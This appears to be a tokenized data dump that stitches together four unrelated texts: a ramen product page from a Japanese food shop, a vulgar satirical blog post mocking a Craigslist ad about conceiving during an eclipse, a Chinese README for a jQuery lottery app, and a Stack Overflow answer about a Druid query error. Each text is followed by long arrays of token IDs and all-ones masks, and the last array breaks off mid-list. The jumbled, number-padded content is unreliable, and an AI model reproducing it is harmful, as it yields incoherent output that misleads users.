Maruchan Non Fried Chicken Soy Sauce Ramen Maruchan Non Fried Chicken Soy Sauce Ramen contains non-fried, thin style Japanese ramen noodles in a delicious chicken and soy sauce based soup with garnishes of spring onion, fish cake, bamboo shoots and crispy nori seaweed. Great for a light meal or quick hot snack away from home, all you need to enjoy your Maruchan Non Fried Chicken Soy Sauce Ramen is boiling water and chopsticks, or a fork if you have to! Size: 97g How to make Maruchan Non Fried Chicken Soy Sauce Ramen; Peel back the lid to the marked line (about halfway). Remove the soup sachet, garnish, and nori seaweed. Empty the garnish onto the noodles and pour on hot water up to the line. Re-close the lid and wait 4 minutes. Then add the soup liquid and mix well. For more information about The Japanese Shop delivery details, please click here. Shop with confidence with our 100% Money Back Guarantee and FREE Returns!We want you to be delighted with your order so if for any reason you are not completely satisfied, please return it to us within 28 days for a prompt exchange or a full refund. Please keep your proof of posting certificate as unfortunately we can't be held responsible for any items which are lost in the post. Goods must be returned unused, in their original packaging and ideally with a copy of your original order. On receipt of the goods, and assuming they are in a re-saleable condition, we will refund the price paid for the goods and the return postage within 3 days. For more information about The Japanese Shop returns policy please click here. FREE Japanese style gift-wrapping! In Japan the presentation of your gift is almost as important as the gift itself so in true Japanese style we can offer you a FREE gift-wrapping service! We wrap your gifts using a special Japanese textured paper to which we then affix either a small origami crane bird (which represents love and peace in Japan) or a mizuhiki (coloured wire) motif. If you would like your order gift-wrapped please remember to select the Gift-Wrapping option from the drop down box on the product page when placing your order, if you do not select this option we will assume that you do not require gift-wrapping. For more information about The Japanese Shop gift-wrapping, please click here.
[ 1, 1085, 987, 273, 10050, 6662, 678, 21475, 1105, 29891, 23863, 346, 390, 5071, 13, 13, 7083, 987, 273, 10050, 6662, 678, 21475, 1105, 29891, 23863, 346, 390, 5071, 3743, 1661, 29899, 17283, 29892, 16835, 3114, 10369, 364, 5071, 694, 397, 793, 297, 263, 628, 14803, 521, 21475, 322, 577, 29891, 12507, 346, 2729, 22300, 411, 330, 2753, 17006, 310, 6709, 373, 291, 29892, 9427, 274, 1296, 29892, 289, 314, 833, 29877, 17394, 1862, 322, 2181, 275, 2272, 3643, 29875, 7205, 705, 287, 29889, 7027, 363, 263, 3578, 592, 284, 470, 4996, 7375, 5807, 547, 3448, 515, 3271, 29892, 599, 366, 817, 304, 13389, 596, 1085, 987, 273, 10050, 6662, 678, 21475, 1105, 29891, 23863, 346, 390, 5071, 338, 1045, 6504, 4094, 322, 521, 459, 303, 7358, 29892, 470, 263, 27350, 565, 366, 505, 304, 29991, 13, 13, 3505, 29901, 29871, 29929, 29955, 29887, 13, 13, 5328, 304, 1207, 1085, 987, 273, 10050, 6662, 678, 21475, 1105, 29891, 23863, 346, 390, 5071, 29936, 13, 13, 15666, 295, 1250, 278, 17343, 304, 278, 10902, 1196, 313, 12717, 4203, 1582, 467, 15154, 278, 22300, 269, 496, 300, 29892, 330, 2753, 728, 29892, 322, 3643, 29875, 7205, 705, 287, 29889, 13, 13, 8915, 278, 330, 2753, 728, 11480, 278, 694, 397, 793, 322, 1671, 373, 7375, 4094, 701, 304, 278, 1196, 29889, 830, 29899, 5358, 278, 17343, 322, 4480, 29871, 29946, 6233, 29889, 1987, 788, 278, 22300, 23904, 322, 6837, 1532, 29889, 13, 13, 2831, 901, 2472, 1048, 450, 10369, 1383, 459, 28289, 4902, 29892, 3113, 2828, 1244, 29889, 13, 13, 2713, 459, 411, 16420, 411, 1749, 29871, 29896, 29900, 29900, 29995, 341, 4992, 7437, 2088, 9519, 29872, 322, 383, 21661, 16969, 29991, 4806, 864, 366, 304, 367, 15319, 287, 411, 596, 1797, 577, 565, 363, 738, 2769, 366, 526, 451, 6446, 15787, 29892, 3113, 736, 372, 304, 502, 2629, 29871, 29906, 29947, 3841, 363, 263, 9508, 14523, 470, 263, 2989, 2143, 870, 29889, 3529, 3013, 596, 5296, 310, 16742, 12289, 408, 15428, 591, 508, 29915, 29873, 367, 4934, 14040, 363, 738, 4452, 607, 526, 5714, 297, 278, 1400, 29889, 7197, 29879, 1818, 367, 4133, 443, 3880, 29892, 297, 1009, 2441, 4870, 6751, 322, 1957, 635, 411, 263, 3509, 310, 596, 2441, 1797, 29889, 1551, 2414, 21278, 310, 278, 22535, 29892, 322, 10241, 896, 526, 297, 263, 337, 29899, 29879, 744, 519, 4195, 29892, 591, 674, 2143, 870, 278, 8666, 12530, 363, 278, 22535, 322, 278, 736, 1400, 482, 2629, 29871, 29941, 3841, 29889, 13, 13, 2831, 901, 2472, 1048, 450, 10369, 1383, 459, 3639, 8898, 3113, 2828, 1244, 29889, 13, 13, 29943, 21661, 10369, 3114, 19797, 29899, 29893, 336, 3262, 29991, 13, 13, 797, 5546, 278, 24329, 310, 596, 19797, 338, 4359, 408, 4100, 408, 278, 19797, 3528, 577, 297, 1565, 10369, 3114, 591, 508, 5957, 366, 263, 383, 21661, 19797, 29899, 29893, 336, 3262, 2669, 29991, 1334, 12244, 596, 330, 17741, 773, 263, 4266, 10369, 1426, 2955, 5650, 304, 607, 591, 769, 2756, 861, 2845, 263, 2319, 1677, 4479, 274, 10800, 11199, 313, 4716, 11524, 5360, 322, 10776, 297, 5546, 29897, 470, 263, 286, 466, 16099, 10058, 313, 1054, 14076, 8014, 29897, 3184, 361, 29889, 13, 13, 3644, 366, 723, 763, 596, 1797, 19797, 29899, 29893, 336, 2986, 3113, 6456, 304, 1831, 278, 402, 2027, 29899, 29956, 336, 3262, 2984, 515, 278, 5768, 1623, 3800, 373, 278, 3234, 1813, 746, 24421, 596, 1797, 29892, 565, 366, 437, 451, 1831, 445, 2984, 591, 674, 5251, 393, 366, 437, 451, 1996, 19797, 29899, 29893, 336, 3262, 29889, 13, 13, 2831, 901, 2472, 1048, 450, 10369, 1383, 459, 19797, 29899, 29893, 336, 3262, 29892, 3113, 2828, 1244, 29889 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
This week in white people gotta be stopped: Someone claiming to be a 40-year-old "caucasian male from Europe" with a "strong and pure" heritage posted a Craiglist ad looking for a nice woman to impregnate during a solar eclipse. "I am looking for a worthy female with strong genes, beauty and smarts," he writes in the predictable cadence of someone who has never had sex before. "If we have chemistry, I would like for us to make love while the eclipse is happening. When totality occurs, we will have simultaneous orgasms and we will conceive a child that will be on the next level of human evolution." (Here is the part in the blog where we note that this listing could be fake, but for the sake of content let's assume it's real): "We will make love together, with me and my penis directed towards the sun. Everything will be aligned in the local universe. Both of our cosmic orgasmic energy will be aligned with the planets." This isn't just about making dick sundials for fun, though. Like all responsible solar eclipse sex-havers, our white supremacist friend establishes a few social parameters for his prospective lady friend: "Drugs are OK." We can get behind that! Maybe a nice blunt perhaps or— "Nitrous Oxide while we climax and experience totality and conception, is OK with me." If orgasm whip-its are what the #MAGA crowd is into that would explain a lot, quite frankly. BUT: "You must like cats." Ah, mystery solved. This Craigslist ad was written by a horny cat. ME-OW. Watch Now: Please Help Robert Pattinson Find a Hot Dog
[ 1, 910, 4723, 297, 4796, 2305, 2355, 941, 367, 11084, 29901, 3834, 650, 5995, 292, 304, 367, 263, 29871, 29946, 29900, 29899, 6360, 29899, 1025, 376, 29883, 585, 9398, 713, 14263, 515, 4092, 29908, 411, 263, 376, 1110, 322, 8296, 29908, 902, 16639, 8059, 263, 28050, 1761, 594, 3063, 363, 263, 7575, 6114, 304, 527, 1457, 5138, 403, 2645, 263, 21635, 16517, 29889, 376, 29902, 626, 3063, 363, 263, 24717, 12944, 411, 4549, 2531, 267, 29892, 15409, 322, 1560, 5708, 1699, 540, 15873, 297, 278, 8500, 519, 13840, 663, 310, 4856, 1058, 756, 2360, 750, 7916, 1434, 29889, 376, 3644, 591, 505, 8950, 6020, 29892, 306, 723, 763, 363, 502, 304, 1207, 5360, 1550, 278, 16517, 338, 10464, 29889, 1932, 2025, 2877, 10008, 29892, 591, 674, 505, 16991, 681, 1638, 294, 1516, 322, 591, 674, 10628, 573, 263, 2278, 393, 674, 367, 373, 278, 2446, 3233, 310, 5199, 14675, 1213, 13, 13, 29898, 10605, 338, 278, 760, 297, 278, 12618, 988, 591, 4443, 393, 445, 18028, 1033, 367, 25713, 29892, 541, 363, 278, 16563, 310, 2793, 1235, 29915, 29879, 5251, 372, 29915, 29879, 1855, 1125, 13, 13, 29908, 4806, 674, 1207, 5360, 4208, 29892, 411, 592, 322, 590, 6584, 275, 10624, 7113, 278, 6575, 29889, 17296, 674, 367, 26118, 297, 278, 1887, 19859, 29889, 9134, 310, 1749, 6776, 13076, 1638, 11625, 293, 5864, 674, 367, 26118, 411, 278, 3814, 1691, 1213, 13, 13, 4013, 3508, 29915, 29873, 925, 1048, 3907, 270, 860, 480, 299, 616, 29879, 363, 2090, 29892, 2466, 29889, 8502, 599, 14040, 21635, 16517, 7916, 29899, 2350, 874, 29892, 1749, 4796, 22747, 8628, 391, 5121, 10127, 267, 263, 2846, 5264, 4128, 363, 670, 10791, 12645, 11379, 5121, 29901, 13, 13, 29908, 29928, 582, 3174, 526, 9280, 1213, 13, 13, 4806, 508, 679, 5742, 393, 29991, 7198, 263, 7575, 1999, 1657, 6060, 470, 30003, 13, 13, 29908, 29940, 277, 29878, 681, 9471, 680, 1550, 591, 10784, 1165, 322, 7271, 2025, 2877, 322, 26192, 29892, 338, 9280, 411, 592, 1213, 13, 13, 3644, 1638, 11625, 377, 666, 29899, 1169, 526, 825, 278, 396, 1529, 12739, 19174, 338, 964, 393, 723, 5649, 263, 3287, 29892, 3755, 2524, 29895, 368, 29889, 350, 2692, 29901, 13, 13, 29908, 3492, 1818, 763, 274, 1446, 1213, 13, 13, 17565, 29892, 29236, 7484, 29889, 910, 14279, 23379, 1761, 594, 471, 3971, 491, 263, 25341, 29891, 6635, 29889, 22986, 29899, 9806, 29889, 13, 13, 24709, 2567, 29901, 13, 13, 12148, 22305, 4755, 349, 1131, 26803, 10987, 263, 8843, 18776 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
# hanshan-lottery ## 特点 - 原创开发 - 中国风十足 - 绿色应用,开箱即用,暂时没有那么多花里胡哨的项目架构 ## 运行 ```bash $ git clone https://github.com/hanxiansen/hanshan-lottery.git $ cd hanshan-lottery $ npm install $ npm start ``` 或者直接clone下来,双击打开index.html就可以了 ## 抽奖 1. 运行项目 2. 一、二、三、纪念奖对应1、2、3、4按键,抽奖前选择对应的奖项 3. 点击开始抽奖按钮(或space空格键) —> 按钮显示可以抽奖了 —> 再点击抽奖按钮(或space空格键) —> 显示中奖人员 ## 注意 1. logo上的文字所用字体为【文鼎习字体】 ## 后记 项目是在2016年年底给公司做的年会抽奖项目,自豪的采用jquery和原生js开发,用时一个月独立开发而成,想当年,那时我还没在项目中使用MVVM框架开发,而是稳妥的采用了jquery这个老朋友,最后在公司年会上因为我们技术部抽的奖比较多而被质疑(虽然项目全都运行在客户端,但是还是敌不过技术原罪,orz...)。这不又快到年关了,莫名的想起了当年开发的这个年会项目,想想应该会有些朋友需要吧,就拿出来给各位老铁抛下砖,希望能有所为,当时开发时还是很用心的,虽然项目代码质量一般,但在产品设计和ui打造方面可是倾注了我很多心血滴,所以希望各位江湖朋友看到写的烂的地方时请理性指正,还望不要喷人。 最后还希望各位能多提点意见,多多star、fork,如果star的人比较多,我会继续完善和升级这个项目,你的关注是我前进的动力,哈哈哈哈。
[ 1, 396, 22374, 5403, 29899, 8276, 22005, 30004, 13, 2277, 29871, 31141, 30940, 30004, 13, 29899, 29871, 30667, 31441, 31026, 30910, 30004, 13, 29899, 29871, 30275, 30356, 236, 166, 145, 30802, 31722, 30004, 13, 29899, 29871, 234, 190, 194, 31085, 31370, 30406, 30214, 31026, 234, 177, 180, 232, 144, 182, 30406, 30214, 233, 157, 133, 30594, 31423, 30417, 31356, 31882, 30923, 30830, 30755, 235, 134, 164, 232, 150, 171, 30210, 31888, 30895, 233, 161, 185, 31901, 30004, 13, 30004, 13, 2277, 29871, 31894, 30448, 6756, 13, 28956, 13067, 30004, 13, 29938, 6315, 17432, 2045, 597, 3292, 29889, 510, 29914, 5403, 5389, 29401, 29914, 29882, 550, 5403, 29899, 8276, 22005, 29889, 5559, 30004, 13, 29938, 14965, 22374, 5403, 29899, 8276, 22005, 30004, 13, 29938, 12480, 2601, 30004, 13, 29938, 12480, 1369, 30004, 13, 28956, 30004, 13, 31391, 30767, 31157, 31092, 16513, 30557, 30805, 29892, 31960, 31768, 31656, 31026, 2248, 29889, 1420, 31238, 30682, 30651, 30743, 30004, 13, 30004, 13, 2277, 29871, 233, 141, 192, 232, 168, 153, 30004, 13, 29896, 29889, 29871, 31894, 30448, 31888, 30895, 30004, 13, 29906, 29889, 29871, 30287, 30330, 30685, 30330, 30457, 30330, 234, 189, 173, 232, 194, 184, 232, 168, 153, 30783, 31370, 29896, 30330, 29906, 30330, 29941, 30330, 29946, 31590, 236, 151, 177, 30214, 233, 141, 192, 232, 168, 153, 30658, 31333, 233, 142, 172, 30783, 31370, 30210, 232, 168, 153, 31888, 30004, 13, 29941, 29889, 29871, 30940, 31768, 31026, 31020, 233, 141, 192, 232, 168, 153, 31590, 236, 149, 177, 29898, 31391, 3493, 30816, 31168, 236, 151, 177, 29897, 813, 29958, 29871, 31590, 236, 149, 177, 31542, 30858, 30682, 30651, 233, 141, 192, 232, 168, 153, 30743, 813, 29958, 29871, 31733, 30940, 31768, 233, 141, 192, 232, 168, 153, 31590, 236, 149, 177, 29898, 31391, 3493, 30816, 31168, 236, 151, 177, 29897, 813, 29958, 29871, 31542, 30858, 30275, 232, 168, 153, 30313, 31911, 30004, 13, 30004, 13, 2277, 29871, 31368, 31474, 30004, 13, 29896, 29889, 20194, 30429, 30210, 30333, 30578, 30744, 30406, 30578, 30988, 30573, 31478, 30333, 236, 191, 145, 231, 188, 163, 30578, 30988, 31472, 30004, 13, 30004, 13, 30004, 13, 2277, 29871, 30822, 31410, 30004, 13, 31888, 30895, 30392, 30505, 29906, 29900, 29896, 29953, 30470, 30470, 232, 189, 152, 31999, 30539, 30931, 232, 132, 157, 30210, 30470, 30437, 233, 141, 192, 232, 168, 153, 31888, 30895, 30214, 30688, 235, 180, 173, 30210, 236, 138, 138, 30406, 5880, 30503, 30667, 30486, 1315, 31026, 30910, 30214, 30406, 30594, 30287, 30502, 30534, 234, 142, 175, 30939, 31026, 30910, 31325, 30494, 30214, 31522, 30948, 30470, 30214, 31356, 30594, 30672, 31994, 31423, 30505, 31888, 30895, 30275, 30785, 30406, 29924, 29963, 9219, 233, 164, 137, 233, 161, 185, 31026, 30910, 30214, 31325, 30392, 234, 171, 182, 232, 169, 168, 30210, 236, 138, 138, 30406, 30743, 5880, 30810, 30502, 31506, 233, 159, 142, 31373, 30214, 30878, 30822, 30505, 30539, 30931, 30470, 30437, 30429, 31570, 30573, 30672, 31381, 31615, 233, 159, 178, 30636, 233, 141, 192, 30210, 232, 168, 153, 31419, 235, 193, 134, 30923, 31325, 31407, 235, 183, 171, 234, 153, 148, 29898, 235, 156, 192, 31516, 31888, 30895, 30753, 30769, 31894, 30448, 30505, 31915, 31229, 234, 174, 178, 30214, 231, 192, 137, 30392, 31994, 30392, 233, 152, 143, 30413, 31138, 31615, 233, 159, 178, 30667, 234, 192, 173, 30214, 272, 29920, 11410, 30267, 30810, 30413, 232, 146, 139, 232, 194, 174, 30780, 30470, 31057, 30743, 30214, 235, 145, 174, 30548, 30210, 31522, 31558, 30743, 30948, 30470, 31026, 30910, 30210, 30810, 30502, 30470, 30437, 31888, 30895, 30214, 31522, 31522, 31370, 31751, 30437, 30417, 31959, 233, 159, 142, 31373, 31383, 30698, 232, 147, 170, 30214, 31238, 233, 142, 194, 30544, 30805, 31999, 232, 147, 135, 30956, 31506, 236, 150, 132, 233, 141, 158, 30557, 234, 163, 153, 30214, 31841, 31839, 30815, 30417, 30744, 30573, 30214, 30948, 30594, 31026, 30910, 30594, 31994, 30392, 232, 193, 139, 30406, 30869, 30210, 30214, 235, 156, 192, 31516, 31888, 30895, 30690, 31183, 235, 183, 171, 31180, 30287, 235, 139, 175, 30214, 231, 192, 137, 30505, 231, 189, 170, 31399, 30872, 31466, 30503, 1481, 31656, 31420, 30525, 30806, 30682, 30392, 232, 131, 193, 31368, 30743, 30672, 232, 193, 139, 30923, 30869, 235, 164, 131, 233, 190, 183, 30214, 30744, 30651, 31841, 31839, 232, 147, 135, 30956, 30775, 31496, 233, 159, 142, 31373, 31811, 30780, 31479, 30210, 234, 134, 133, 30210, 30533, 30525, 30594, 31088, 30687, 30952, 31084, 30724, 30214, 31994, 31839, 30413, 30698, 232, 153, 186, 30313, 30267, 30004, 13, 30878, 30822, 31994, 31841, 31839, 232, 147, 135, 30956, 30815, 30923, 31302, 30940, 31474, 235, 170, 132, 30214, 30923, 30923, 8508, 30330, 29888, 548, 30214, 30847, 30801, 8508, 30210, 30313, 31419, 235, 193, 134, 30923, 30214, 30672, 30437, 234, 190, 170, 234, 190, 176, 31366, 232, 153, 135, 30503, 232, 144, 138, 234, 189, 170, 30810, 30502, 31888, 30895, 30214, 30919, 30210, 31057, 31368, 30392, 30672, 30658, 31174, 30210, 30846, 31074, 30214, 232, 150, 139, 232, 150, 139, 232, 150, 139, 232, 150, 139, 30267 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1 ]
Q: No content to map due to end-of-input Seemingly out of the blue I'm getting this response to formerly working Druid queries. My guess is this isn't specific to Druid, but I can't seem to figure it out: { "error" : "No content to map due to end-of-input\n at [Source: [B@2862fe6e; line: 1, column: 1]" } A: This error means that query send to druid is empty. Easiest way to make this error is by executing query in wrong directory. Directory structure: /druid /config /examples /wikipedia You have created query in directory /druid/examples/wikipedia You have executed query in directory /druid/examples/wikipedia (it works) You have went to /druid/config to change some configuration You have executed old command using history feature of your shell (it doesn't work)
[ 1, 660, 29901, 13, 13, 3782, 2793, 304, 2910, 2861, 304, 1095, 29899, 974, 29899, 2080, 13, 13, 2008, 331, 11687, 714, 310, 278, 7254, 306, 29915, 29885, 2805, 445, 2933, 304, 21510, 1985, 16597, 333, 9365, 29889, 1619, 4140, 338, 445, 3508, 29915, 29873, 2702, 304, 16597, 333, 29892, 541, 306, 508, 29915, 29873, 2833, 304, 4377, 372, 714, 29901, 13, 29912, 13, 29871, 376, 2704, 29908, 584, 376, 3782, 2793, 304, 2910, 2861, 304, 1095, 29899, 974, 29899, 2080, 29905, 29876, 472, 518, 4435, 29901, 518, 29933, 29992, 29906, 29947, 29953, 29906, 1725, 29953, 29872, 29936, 1196, 29901, 29871, 29896, 29892, 1897, 29901, 29871, 29896, 18017, 13, 29913, 13, 13, 29909, 29901, 13, 13, 4013, 1059, 2794, 393, 2346, 3638, 304, 5883, 333, 338, 4069, 29889, 13, 29923, 6840, 342, 982, 304, 1207, 445, 1059, 338, 491, 14012, 2346, 297, 2743, 3884, 29889, 13, 9882, 3829, 29901, 13, 29914, 26179, 333, 13, 1678, 847, 2917, 13, 1678, 847, 19057, 13, 4706, 847, 6011, 13, 13, 3492, 505, 2825, 2346, 297, 3884, 847, 26179, 